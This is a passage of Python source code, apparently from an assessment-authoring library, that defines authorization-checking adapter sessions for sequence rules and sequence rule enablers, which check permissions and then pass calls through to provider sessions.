class SequenceRuleSearchSession(abc_assessment_authoring_sessions.SequenceRuleSearchSession, SequenceRuleQuerySession):
"""Adapts underlying SequenceRuleSearchSession methodswith authorization checks."""
def get_sequence_rule_search(self):
"""Pass through to provider SequenceRuleSearchSession.get_sequence_rule_search"""
# Implemented from azosid template for -
# osid.resource.ResourceSearchSession.get_resource_search_template
if not self._can('search'):
raise PermissionDenied()
return self._provider_session.get_sequence_rule_search()
sequence_rule_search = property(fget=get_sequence_rule_search)
def get_sequence_rule_search_order(self):
raise Unimplemented()
sequence_rule_search_order = property(fget=get_sequence_rule_search_order)
@raise_null_argument
def get_sequence_rules_by_search(self, sequence_rule_query, sequence_rule_search):
"""Pass through to provider SequenceRuleSearchSession.get_sequence_rules_by_search"""
# Implemented from azosid template for -
# osid.resource.ResourceSearchSession.get_resources_by_search_template
if not self._can('search'):
raise PermissionDenied()
return self._provider_session.get_sequence_rules_by_search(sequence_rule_query, sequence_rule_search)
@raise_null_argument
def get_sequence_rule_query_from_inspector(self, sequence_rule_query_inspector):
raise Unimplemented()
class SequenceRuleAdminSession(abc_assessment_authoring_sessions.SequenceRuleAdminSession, osid_sessions.OsidSession):
"""Adapts underlying SequenceRuleAdminSession methodswith authorization checks."""
def __init__(self, provider_manager, *args, **kwargs):
osid_sessions.OsidSession.__init__(self, *args, **kwargs)
self._qualifier_id = self._provider_session.get_bank_id()
self._id_namespace = 'assessment_authoring.SequenceRule'
self._overriding_bank_ids = None
if self._proxy is not None:
try:
self._object_catalog_session = provider_manager.get_sequence_rule_bank_session(self._proxy)
except (Unimplemented, AttributeError):
pass
else:
try:
self._object_catalog_session = provider_manager.get_sequence_rule_bank_session()
self.get_bank_ids_by_sequence_rule = self._object_catalog_session.get_bank_ids_by_sequence_rule
except (Unimplemented, AttributeError):
pass
def _get_overriding_bank_ids(self):
if self._overriding_bank_ids is None:
self._overriding_bank_ids = self._get_overriding_catalog_ids('lookup')
return self._overriding_bank_ids
def _can_for_sequence_rule(self, func_name, sequence_rule_id):
"""Checks if agent can perform function for object"""
return self._can_for_object(func_name, sequence_rule_id, 'get_bank_ids_for_sequence_rule')
def get_bank_id(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_id_template
return self._provider_session.get_bank_id()
bank_id = property(fget=get_bank_id)
def get_bank(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_template
if not self._can('lookup'):
raise PermissionDenied()
else:
return self._provider_session.get_bank()
bank = property(fget=get_bank)
def can_create_sequence_rule(self):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.can_create_resources
return self._can('create')
@raise_null_argument
def can_create_sequence_rule_with_record_types(self, sequence_rule_record_types):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.can_create_resource_with_record_types
# This would like to be a real implementation someday:
if sequence_rule_record_types is None:
raise NullArgument() # Just 'cause the spec says to :)
return self._can('create')
@raise_null_argument
def get_sequence_rule_form_for_create(self, assessment_part_id, next_assessment_part_id, sequence_rule_record_types):
if not self._can('create'):
raise PermissionDenied()
return self._provider_session.get_sequence_rule_form_for_create(assessment_part_id,
next_assessment_part_id,
sequence_rule_record_types)
@raise_null_argument
def create_sequence_rule(self, sequence_rule_form):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.create_resource
if not self._can('create'):
raise PermissionDenied()
return self._provider_session.create_sequence_rule(sequence_rule_form)
def can_update_sequence_rules(self):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.can_update_resources
return (self._can('update') or
bool(self._get_overriding_catalog_ids('update')))
@raise_null_argument
def get_sequence_rule_form_for_update(self, sequence_rule_id):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.get_resource_form_for_update
if not self._can_for_sequence_rule('update', sequence_rule_id):
raise PermissionDenied()
return self._provider_session.get_sequence_rule_form_for_update(sequence_rule_id)
def duplicate_sequence_rule(self, sequence_rule_id):
if not self._can('update'):
raise PermissionDenied()
return self._provider_session.duplicate_sequence_rule(sequence_rule_id)
@raise_null_argument
def update_sequence_rule(self, sequence_rule_form):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.update_resource
if not self._can('update'):
raise PermissionDenied()
return self._provider_session.update_sequence_rule(sequence_rule_form)
def can_delete_sequence_rules(self):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.can_delete_resources
return (self._can('delete') or
bool(self._get_overriding_catalog_ids('delete')))
@raise_null_argument
def delete_sequence_rule(self, sequence_rule_id):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.delete_resource
if not self._can_for_sequence_rule('delete', sequence_rule_id):
raise PermissionDenied()
return self._provider_session.delete_sequence_rule(sequence_rule_id)
def can_manage_sequence_rule_aliases(self):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.can_manage_resource_aliases
return (self._can('manage') or
bool(self._get_overriding_catalog_ids('manage')))
@raise_null_argument
def alias_sequence_rule(self, sequence_rule_id, alias_id):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.alias_resources
if not self._can_for_sequence_rule('alias', sequence_rule_id):
raise PermissionDenied()
return self._provider_session.alias_sequence_rule(sequence_rule_id, alias_id)
def can_sequence_sequence_rules(self):
raise Unimplemented()
@raise_null_argument
def move_sequence_rule_ahead(self, sequence_rule_id, assessment_part_id, reference_id):
raise Unimplemented()
@raise_null_argument
def move_sequence_rule_behind(self, sequence_rule_id, assessment_part_id, reference_id):
raise Unimplemented()
@raise_null_argument
def order_sequence_rules(self, sequence_rule_ids, assessment_part_id):
raise Unimplemented()
class SequenceRuleNotificationSession(abc_assessment_authoring_sessions.SequenceRuleNotificationSession, osid_sessions.OsidSession):
"""Adapts underlying SequenceRuleNotificationSession methodswith authorization checks."""
def __init__(self, *args, **kwargs):
osid_sessions.OsidSession.__init__(self, *args, **kwargs)
self._qualifier_id = self._provider_session.get_bank_id()
self._id_namespace = 'assessment_authoring.SequenceRule'
def get_bank_id(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_id_template
return self._provider_session.get_bank_id()
bank_id = property(fget=get_bank_id)
def get_bank(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_template
if not self._can('lookup'):
raise PermissionDenied()
else:
return self._provider_session.get_bank()
bank = property(fget=get_bank)
def can_register_for_sequence_rule_notifications(self):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.can_register_for_resource_notifications
return self._can('register')
def use_federated_bank_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_federated_bin_view_template
self._use_federated_catalog_view()
self._provider_session.use_federated_bank_view()
if self._query_session:
self._query_session.use_federated_bank_view()
def use_isolated_bank_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_isolated_bin_view_template
self._use_isolated_catalog_view()
self._provider_session.use_isolated_bank_view()
if self._query_session:
self._query_session.use_isolated_bank_view()
def reliable_sequence_rule_notifications(self):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_new_resources
self._provider_session.reliable_sequence_rule_notifications()
def unreliable_sequence_rule_notifications(self):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_new_resources
self._provider_session.unreliable_sequence_rule_notifications()
@raise_null_argument
def acknowledge_sequence_rule_notification(self, notification_id):
raise Unimplemented()
def register_for_new_sequence_rules(self):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_new_resources
if not self._can('register'):
raise PermissionDenied()
self._provider_session.register_for_new_sequence_rules()
@raise_null_argument
def register_for_new_sequence_rules_for_assessment_part(self, assessment_part_id):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_new_resources
if not self._can('register'):
raise PermissionDenied()
self._provider_session.register_for_new_sequence_rules_for_assessment_part()
@raise_null_argument
def register_for_new_sequence_rules_for_next_assessment_part(self, assessment_part_id):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_new_resources
if not self._can('register'):
raise PermissionDenied()
self._provider_session.register_for_new_sequence_rules_for_next_assessment_part()
def register_for_changed_sequence_rules(self):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_changed_resources
if not self._can('register'):
raise PermissionDenied()
self._provider_session.register_for_changed_sequence_rules()
@raise_null_argument
def register_for_changed_sequence_rules_for_assessment_part(self, assessment_part_id):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_changed_resource
if not self._can('register'):
raise PermissionDenied()
self._provider_session.register_for_changed_sequence_rules_for_assessment_part(assessment_part_id)
@raise_null_argument
def register_for_changed_sequence_rules_for_next_assessment_part(self, assessment_part_id):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_changed_resource
if not self._can('register'):
raise PermissionDenied()
self._provider_session.register_for_changed_sequence_rules_for_next_assessment_part(assessment_part_id)
@raise_null_argument
def register_for_changed_sequence_rule(self, sequence_rule_id):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_changed_resource
if not self._can('register'):
raise PermissionDenied()
self._provider_session.register_for_changed_sequence_rule(sequence_rule_id)
def register_for_deleted_sequence_rules(self):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_deleted_resources
if not self._can('register'):
raise PermissionDenied()
self._provider_session.register_for_deleted_sequence_rules()
@raise_null_argument
def register_for_deleted_sequence_rules_for_assessment_part(self, assessment_part_id):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_deleted_resource
if not self._can('register'):
raise PermissionDenied()
self._provider_session.register_for_deleted_sequence_rules_for_assessment_part(assessment_part_id)
@raise_null_argument
def register_for_deleted_sequence_rules_for_next_assessment_part(self, assessment_part_id):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_deleted_resource
if not self._can('register'):
raise PermissionDenied()
self._provider_session.register_for_deleted_sequence_rules_for_next_assessment_part(assessment_part_id)
@raise_null_argument
def register_for_deleted_sequence_rule(self, sequence_rule_id):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_deleted_resource
if not self._can('register'):
raise PermissionDenied()
self._provider_session.register_for_deleted_sequence_rule(sequence_rule_id)
def reliable_sequence_rule_notifications(self):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_new_resources
self._provider_session.reliable_sequence_rule_notifications()
def unreliable_sequence_rule_notifications(self):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_new_resources
self._provider_session.unreliable_sequence_rule_notifications()
@raise_null_argument
def acknowledge_sequence_rule_notification(self, notification_id):
raise Unimplemented()
class SequenceRuleBankSession(abc_assessment_authoring_sessions.SequenceRuleBankSession, osid_sessions.OsidSession):
"""Adapts underlying SequenceRuleBankSession methodswith authorization checks."""
def __init__(self, *args, **kwargs):
osid_sessions.OsidSession.__init__(self, *args, **kwargs)
self._qualifier_id = Id('assessment_authoring.Bank%3AROOT%40ODL.MIT.EDU') # This could be better
self._id_namespace = 'assessment_authoring.SequenceRuleBank'
def can_lookup_sequence_rule_bank_mappings(self):
# Implemented from azosid template for -
# osid.resource.ResourceBinSession.can_lookup_resource_bin_mappings
return self._can('lookup')
def use_comparative_sequence_rule_bank_view(self):
# Implemented from azosid template for -
# osid.resource.BinLookupSession.use_comparative_bin_view_template
self._provider_session.use_comparative_sequence_rule_bank_view()
def use_plenary_sequence_rule_bank_view(self):
# Implemented from azosid template for -
# osid.resource.BinLookupSession.use_plenary_bin_view_template
self._provider_session.use_plenary_sequence_rule_bank_view()
@raise_null_argument
def get_sequence_rule_ids_by_bank(self, bank_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinSession.get_resource_ids_by_bin
if not self._can('lookup'):
raise PermissionDenied()
return self._provider_session.get_sequence_rule_ids_by_bank(bank_id)
@raise_null_argument
def get_sequence_rules_by_bank(self, bank_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinSession.get_resources_by_bin_template
if not self._can('lookup'):
raise PermissionDenied()
return self._provider_session.get_sequence_rules_by_bank(bank_id)
@raise_null_argument
def get_sequence_rule_ids_by_banks(self, bank_ids):
# Implemented from azosid template for -
# osid.resource.ResourceBinSession.get_resource_ids_by_bins
if not self._can('lookup'):
raise PermissionDenied()
return self._provider_session.get_sequence_rule_ids_by_banks(bank_ids)
@raise_null_argument
def get_sequence_rules_by_banks(self, bank_ids):
# Implemented from azosid template for -
# osid.resource.ResourceBinSession.get_resources_by_bins
if not self._can('lookup'):
raise PermissionDenied()
return self._provider_session.get_sequence_rules_by_banks(bank_ids)
@raise_null_argument
def get_bank_ids_by_sequence_rule(self, sequence_rule_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinSession.get_bin_ids_by_resource
if not self._can('lookup'):
raise PermissionDenied()
return self._provider_session.get_bank_ids_by_sequence_rule(sequence_rule_id)
@raise_null_argument
def get_banks_by_sequence_rule(self, sequence_rule_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinSession.get_bins_by_resource
if not self._can('lookup'):
raise PermissionDenied()
return self._provider_session.get_banks_by_sequence_rule(sequence_rule_id)
class SequenceRuleBankAssignmentSession(abc_assessment_authoring_sessions.SequenceRuleBankAssignmentSession, osid_sessions.OsidSession):
"""Adapts underlying SequenceRuleBankAssignmentSession methodswith authorization checks."""
def __init__(self, *args, **kwargs):
osid_sessions.OsidSession.__init__(self, *args, **kwargs)
self._qualifier_id = Id('assessment_authoring.Bank%3AROOT%40ODL.MIT.EDU') # This could be better
self._id_namespace = 'assessment_authoring.SequenceRuleBank'
def can_assign_sequence_rules(self):
# Implemented from azosid template for -
# osid.resource.ResourceBinAssignmentSession.can_assign_resources
return self._can('assign')
@raise_null_argument
def can_assign_sequence_rules_to_bank(self, bank_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinAssignmentSession.can_assign_resources_to_bin
return self._can('assign', qualifier_id=bank_id)
@raise_null_argument
def get_assignable_bank_ids(self, bank_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinAssignmentSession.get_assignable_bin_ids
if not self._can('assign'):
raise PermissionDenied()
return self._provider_session.get_assignable_bank_ids(bank_id)
@raise_null_argument
def get_assignable_bank_ids_for_sequence_rule(self, bank_id, sequence_rule_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinAssignmentSession.get_assignable_bin_ids_for_resource
if not self._can('assign'):
raise PermissionDenied()
return self._provider_session.get_assignable_bank_ids_for_sequence_rule(bank_id, sequence_rule_id)
@raise_null_argument
def assign_sequence_rule_to_bank(self, sequence_rule_id, bank_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinAssignmentSession.assign_resource_to_bin
if not self._can('assign'):
raise PermissionDenied()
return self._provider_session.assign_sequence_rule_to_bank(sequence_rule_id, bank_id)
@raise_null_argument
def unassign_sequence_rule_from_bank(self, sequence_rule_id, bank_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinAssignmentSession.assign_resource_to_bin
if not self._can('assign'):
raise PermissionDenied()
return self._provider_session.unassign_sequence_rule_from_bank(sequence_rule_id, bank_id)
@raise_null_argument
def reassign_sequence_rule_to_bank(self, sequence_rule_id, from_bank_id, to_bank_id):
raise Unimplemented()
class SequenceRuleSmartBankSession(abc_assessment_authoring_sessions.SequenceRuleSmartBankSession, osid_sessions.OsidSession):
"""Adapts underlying SequenceRuleSmartBankSession methodswith authorization checks."""
def get_bank_id(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_id_template
return self._provider_session.get_bank_id()
bank_id = property(fget=get_bank_id)
def get_bank(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_template
if not self._can('lookup'):
raise PermissionDenied()
else:
return self._provider_session.get_bank()
bank = property(fget=get_bank)
def can_manage_smart_banks(self):
raise Unimplemented()
def get_sequence_rule_query(self):
raise Unimplemented()
sequence_rule_query = property(fget=get_sequence_rule_query)
def get_sequence_rule_search_order(self):
raise Unimplemented()
sequence_rule_search_order = property(fget=get_sequence_rule_search_order)
@raise_null_argument
def apply_sequence_rule_query(self, sequence_rule_query):
raise Unimplemented()
def inspect_sequence_rule_query(self):
raise Unimplemented()
@raise_null_argument
def apply_sequence_rule_sequencing(self, sequence_rule_search_order):
raise Unimplemented()
@raise_null_argument
def get_sequence_rule_query_from_inspector(self, sequence_rule_query_inspector):
raise Unimplemented()
class SequenceRuleEnablerLookupSession(abc_assessment_authoring_sessions.SequenceRuleEnablerLookupSession, osid_sessions.OsidSession):
"""Adapts underlying SequenceRuleEnablerLookupSession methodswith authorization checks."""
def get_bank_id(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_id_template
return self._provider_session.get_bank_id()
bank_id = property(fget=get_bank_id)
def get_bank(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_template
if not self._can('lookup'):
raise PermissionDenied()
else:
return self._provider_session.get_bank()
bank = property(fget=get_bank)
def can_lookup_sequence_rule_enablers(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.can_lookup_resources_template
return (self._can('lookup') or
bool(self._get_overriding_catalog_ids('lookup')))
def use_comparative_sequence_rule_enabler_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_comparative_resource_view_template
self._use_comparative_object_view()
self._provider_session.use_comparative_sequence_rule_enabler_view()
def use_plenary_sequence_rule_enabler_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_plenary_resource_view_template
self._use_plenary_object_view()
self._provider_session.use_plenary_sequence_rule_enabler_view()
def use_federated_bank_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_federated_bin_view_template
self._use_federated_catalog_view()
self._provider_session.use_federated_bank_view()
if self._query_session:
self._query_session.use_federated_bank_view()
def use_isolated_bank_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_isolated_bin_view_template
self._use_isolated_catalog_view()
self._provider_session.use_isolated_bank_view()
if self._query_session:
self._query_session.use_isolated_bank_view()
def use_active_sequence_rule_enabler_view(self):
# Implemented from azosid template for -
# osid.composition.CompositionLookupSession.use_active_composition_view
return self._provider_session.use_active_sequence_rule_enabler_view()
def use_any_status_sequence_rule_enabler_view(self):
# Implemented from azosid template for -
# osid.composition.CompositionLookupSession.use_any_status_composition_view
return self._provider_session.use_any_status_sequence_rule_enabler_view()
@raise_null_argument
def get_sequence_rule_enabler(self, sequence_rule_enabler_id):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resource_template
if self._can('lookup'):
return self._provider_session.get_sequence_rule_enabler(sequence_rule_enabler_id)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_enabler_query()
query.match_id(sequence_rule_enabler_id, match=True)
results = self._try_harder(query)
if results.available():
return results.next()
raise NotFound()
@raise_null_argument
def get_sequence_rule_enablers_by_ids(self, sequence_rule_enabler_ids):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resources_by_ids_template
if self._can('lookup'):
return self._provider_session.get_sequence_rule_enablers_by_ids(sequence_rule_enabler_ids)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_enabler_query()
for sequence_rule_enabler_id in (sequence_rule_enabler_ids):
query.match_id(sequence_rule_enabler_id, match=True)
return self._try_harder(query)
@raise_null_argument
def get_sequence_rule_enablers_by_genus_type(self, sequence_rule_enabler_genus_type):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resources_by_genus_type_template
if self._can('lookup'):
return self._provider_session.get_sequence_rule_enablers_by_genus_type(sequence_rule_enabler_genus_type)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_enabler_query()
query.match_genus_type(sequence_rule_enabler_genus_type, match=True)
return self._try_harder(query)
@raise_null_argument
def get_sequence_rule_enablers_by_parent_genus_type(self, sequence_rule_enabler_genus_type):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resources_by_parent_genus_type_template
if self._can('lookup'):
return self._provider_session.get_sequence_rule_enablers_by_parent_genus_type(sequence_rule_enabler_genus_type)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_enabler_query()
query.match_parent_genus_type(sequence_rule_enabler_genus_type, match=True)
return self._try_harder(query)
@raise_null_argument
def get_sequence_rule_enablers_by_record_type(self, sequence_rule_enabler_record_type):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resources_by_record_type_template
if self._can('lookup'):
return self._provider_session.get_sequence_rule_enablers_by_record_type(sequence_rule_enabler_record_type)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_enabler_query()
query.match_record_type(sequence_rule_enabler_record_type, match=True)
return self._try_harder(query)
@raise_null_argument
def get_sequence_rule_enablers_on_date(self, from_, to):
raise Unimplemented()
@raise_null_argument
def get_sequence_rule_enablers_on_date_with_agent(self, agent_id, from_, to):
raise Unimplemented()
def get_sequence_rule_enablers(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resources_template
if self._can('lookup'):
return self._provider_session.get_sequence_rule_enablers()
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_enabler_query()
query.match_any(match=True)
return self._try_harder(query)
sequence_rule_enablers = property(fget=get_sequence_rule_enablers)
class SequenceRuleEnablerQuerySession(abc_assessment_authoring_sessions.SequenceRuleEnablerQuerySession, osid_sessions.OsidSession):
"""Adapts underlying SequenceRuleEnablerQuerySession methodswith authorization checks."""
def get_bank_id(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_id_template
return self._provider_session.get_bank_id()
bank_id = property(fget=get_bank_id)
def get_bank(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_template
if not self._can('lookup'):
raise PermissionDenied()
else:
return self._provider_session.get_bank()
bank = property(fget=get_bank)
def can_search_sequence_rule_enablers(self):
# Implemented from azosid template for -
# osid.resource.ResourceQuerySession.can_search_resources_template
return (self._can('search') or
bool(self._get_overriding_catalog_ids('search')))
def use_federated_bank_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_federated_bin_view_template
self._use_federated_catalog_view()
self._provider_session.use_federated_bank_view()
if self._query_session:
self._query_session.use_federated_bank_view()
def use_isolated_bank_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_isolated_bin_view_template
self._use_isolated_catalog_view()
self._provider_session.use_isolated_bank_view()
if self._query_session:
self._query_session.use_isolated_bank_view()
def get_sequence_rule_enabler_query(self):
# Implemented from azosid template for -
# osid.resource.ResourceQuerySession.get_resource_query_template
if (not self._can('search') and
self._is_isolated_catalog_view()):
raise PermissionDenied()
else:
return self.SequenceRuleEnablerQueryWrapper(self._provider_session.get_sequence_rule_enabler_query())
sequence_rule_enabler_query = property(fget=get_sequence_rule_enabler_query)
@raise_null_argument
def get_sequence_rule_enablers_by_query(self, sequence_rule_enabler_query):
# Implemented from azosid template for -
# osid.resource.ResourceQuerySession.get_resources_by_query_template
if not hasattr(sequence_rule_enabler_query, '_cat_id_args_list'):
raise Unsupported('sequence_rule_enabler_query not from this session')
for kwargs in sequence_rule_enabler_query._cat_id_args_list:
if self._can('search', kwargs['bank_id']):
sequence_rule_enabler_query._provider_query.match_bank_id(**kwargs)
if self._can('search'):
return self._provider_session.get_sequence_rule_enablers_by_query(sequence_rule_enabler_query)
self._check_search_conditions()
result = self._try_harder(sequence_rule_enabler_query)
sequence_rule_enabler_query._provider_query.clear_bank_terms()
return result
class SequenceRuleEnablerSearchSession(abc_assessment_authoring_sessions.SequenceRuleEnablerSearchSession, SequenceRuleEnablerQuerySession):
"""Adapts underlying SequenceRuleEnablerSearchSession methodswith authorization checks."""
def get_sequence_rule_enabler_search(self):
"""Pass through to provider SequenceRuleEnablerSearchSession.get_sequence_rule_enabler_search"""
# Implemented from azosid template for -
# osid.resource.ResourceSearchSession.get_resource_search_template
if not self._can('search'):
raise PermissionDenied()
return self._provider_session.get_sequence_rule_enabler_search()
sequence_rule_enabler_search = property(fget=get_sequence_rule_enabler_search)
def get_sequence_rule_enabler_search_order(self):
raise Unimplemented()
sequence_rule_enabler_search_order = property(fget=get_sequence_rule_enabler_search_order)
@raise_null_argument
def get_sequence_rule_enablers_by_search(self, sequence_rule_enabler_query, sequence_rule_enabler_search):
"""Pass through to provider SequenceRuleEnablerSearchSession.get_sequence_rule_enablers_by_search"""
# Implemented from azosid template for -
# osid.resource.ResourceSearchSession.get_resources_by_search_template
if not self._can('search'):
raise PermissionDenied()
return self._provider_session.get_sequence_rule_enablers_by_search(sequence_rule_enabler_query, sequence_rule_enabler_search)
@raise_null_argument
def get_sequence_rule_enabler_query_from_inspector(self, sequence_rule_enabler_query_inspector):
raise Unimplemented()
class SequenceRuleEnablerAdminSession(abc_assessment_authoring_sessions.SequenceRuleEnablerAdminSession, osid_sessions.OsidSession):
"""Adapts underlying SequenceRuleEnablerAdminSession methodswith authorization checks."""
def get_bank_id(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_id_template
return self._provider_session.get_bank_id()
bank_id = property(fget=get_bank_id)
def get_bank(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_template
if not self._can('lookup'):
raise PermissionDenied()
else:
return self._provider_session.get_bank()
bank = property(fget=get_bank)
def can_create_sequence_rule_enabler(self):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.can_create_resources
return self._can('create')
@raise_null_argument
def can_create_sequence_rule_enabler_with_record_types(self, sequence_rule_enabler_record_types):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.can_create_resource_with_record_types
# This would like to be a real implementation someday:
if sequence_rule_enabler_record_types is None:
raise NullArgument() # Just 'cause the spec says to :)
return self._can('create')
@raise_null_argument
def get_sequence_rule_enabler_form_for_create(self, sequence_rule_enabler_record_types):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.get_resource_form_for_create
if not self._can('create'):
raise PermissionDenied()
return self._provider_session.get_sequence_rule_enabler_form_for_create(sequence_rule_enabler_record_types)
@raise_null_argument
def create_sequence_rule_enabler(self, sequence_rule_enabler_form):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.create_resource
if not self._can('create'):
raise PermissionDenied()
return self._provider_session.create_sequence_rule_enabler(sequence_rule_enabler_form)
def can_update_sequence_rule_enablers(self):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.can_update_resources
return (self._can('update') or
bool(self._get_overriding_catalog_ids('update')))
@raise_null_argument
def get_sequence_rule_enabler_form_for_update(self, sequence_rule_enabler_id):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.get_resource_form_for_update
if not self._can_for_sequence_rule_enabler('update', sequence_rule_enabler_id):
raise PermissionDenied()
return self._provider_session.get_sequence_rule_enabler_form_for_update(sequence_rule_enabler_id)
def duplicate_sequence_rule_enabler(self, sequence_rule_enabler_id):
if not self._can('update'):
raise PermissionDenied()
return self._provider_session.duplicate_sequence_rule_enabler(sequence_rule_enabler_id)
@raise_null_argument
def update_sequence_rule_enabler(self, sequence_rule_enabler_form):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.update_resource
if not self._can('update'):
raise PermissionDenied()
return self._provider_session.update_sequence_rule_enabler(sequence_rule_enabler_form)
def can_delete_sequence_rule_enablers(self):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.can_delete_resources
return (self._can('delete') or
bool(self._get_overriding_catalog_ids('delete')))
@raise_null_argument
def delete_sequence_rule_enabler(self, sequence_rule_enabler_id):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.delete_resource
if not self._can_for_sequence_rule_enabler('delete', sequence_rule_enabler_id):
raise PermissionDenied()
return self._provider_session.delete_sequence_rule_enabler(sequence_rule_enabler_id)
def can_manage_sequence_rule_enabler_aliases(self):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.can_manage_resource_aliases
return (self._can('manage') or
bool(self._get_overriding_catalog_ids('manage')))
@raise_null_argument
def alias_sequence_rule_enabler(self, sequence_rule_enabler_id, alias_id):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.alias_resources
if not self._can_for_sequence_rule_enabler('alias', sequence_rule_enabler_id):
raise PermissionDenied()
return self._provider_session.alias_sequence_rule_enabler(sequence_rule_enabler_id, alias_id)
class SequenceRuleEnablerNotificationSession(abc_assessment_authoring_sessions.SequenceRuleEnablerNotificationSession, osid_sessions.OsidSession):
"""Adapts underlying SequenceRuleEnablerNotificationSession methodswith authorization checks."""
def get_bank_id(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_id_template
return self._provider_session.get_bank_id()
bank_id = property(fget=get_bank_id)
def get_bank(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_template
if not self._can('lookup'):
raise PermissionDenied()
else:
return self._provider_session.get_bank()
bank = property(fget=get_bank)
def can_register_for_sequence_rule_enabler_notifications(self):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.can_register_for_resource_notifications
return self._can('register')
def use_federated_bank_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_federated_bin_view_template
self._use_federated_catalog_view()
self._provider_session.use_federated_bank_view()
if self._query_session:
self._query_session.use_federated_bank_view()
def use_isolated_bank_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_isolated_bin_view_template
self._use_isolated_catalog_view()
self._provider_session.use_isolated_bank_view()
if self._query_session:
self._query_session.use_isolated_bank_view()
def reliable_sequence_rule_enabler_notifications(self):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_new_resources
self._provider_session.reliable_sequence_rule_enabler_notifications()
def unreliable_sequence_rule_enabler_notifications(self):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_new_resources
self._provider_session.unreliable_sequence_rule_enabler_notifications()
@raise_null_argument
